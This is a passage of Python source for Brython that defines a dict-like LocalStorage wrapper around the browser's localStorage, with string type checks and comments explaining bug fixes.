    """dict-like wrapper around the browser's ``window.localStorage``.

    Keys and values are restricted to ``str``, mirroring the DOM storage
    API.  Only usable under Brython (`__BRYTHON__` and the Brython-specific
    ``sys.has_local_storage`` attribute are resolved at runtime).
    """
    storage_type = "local_storage"

    # Sentinel for pop(): distinguishes "no default supplied" from an
    # explicit default=None.  BUGFIX: the original referenced the
    # module-level ``__UnProvided`` class from inside this class body,
    # which Python name-mangles to ``_LocalStorage__UnProvided`` and
    # therefore raises NameError under CPython semantics.  A class-level
    # sentinel avoids the mangled global lookup entirely.
    _MISSING = object()

    def __init__(self):
        if not sys.has_local_storage:
            raise EnvironmentError("LocalStorage not available")
        self.store = JSObject(__BRYTHON__.local_storage)

    @staticmethod
    def _check_key(key):
        # All DOM storage keys are strings; fail fast otherwise.
        if not isinstance(key, str):
            raise TypeError("key must be string")

    def __delitem__(self, key):
        self._check_key(key)
        if key not in self:
            raise KeyError(key)
        self.store.removeItem(key)

    def __getitem__(self, key):
        self._check_key(key)
        res = __BRYTHON__.JSObject(self.store.getItem(key))
        # BUGFIX: test against None instead of truthiness so a key stored
        # with an empty-string value is returned rather than raising
        # KeyError (keeps __getitem__ consistent with __contains__).
        if res is None:
            raise KeyError(key)
        return res

    def __setitem__(self, key, value):
        self._check_key(key)
        if not isinstance(value, str):
            raise TypeError("value must be string")
        self.store.setItem(key, value)

    # implement "in" functionality
    def __contains__(self, key):
        self._check_key(key)
        return __BRYTHON__.JSObject(self.store.getItem(key)) is not None

    def __iter__(self):
        return iter(self.keys())

    def get(self, key, default=None):
        self._check_key(key)
        res = __BRYTHON__.JSObject(self.store.getItem(key))
        # Same None-vs-falsy fix as __getitem__: empty-string values are
        # real values, not misses.
        return default if res is None else res

    def pop(self, key, default=_MISSING):
        self._check_key(key)
        if default is self._MISSING:
            ret = self.get(key)
            del self[key]  # raises KeyError if the key doesn't exist
            return ret
        if key in self:
            ret = self.get(key)
            del self[key]
            return ret
        return default

    # A real dict returns views; lists are simpler here, and a custom
    # iterator would add overhead without much benefit.
    def keys(self):
        return [__BRYTHON__.JSObject(self.store.key(i))
                for i in range(self.store.length)]

    def values(self):
        return [__BRYTHON__.JSObject(self.__getitem__(k)) for k in self.keys()]

    def items(self):
        return list(zip(self.keys(), self.values()))

    def clear(self):
        self.store.clear()

    def __len__(self):
        return self.store.length
# Instantiate the shared storage object only when the host environment
# actually exposes localStorage.  NOTE: `sys.has_local_storage` is a
# Brython-specific attribute; it does not exist on CPython's sys module.
if sys.has_local_storage:
    storage = LocalStorage()
| gpl-3.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.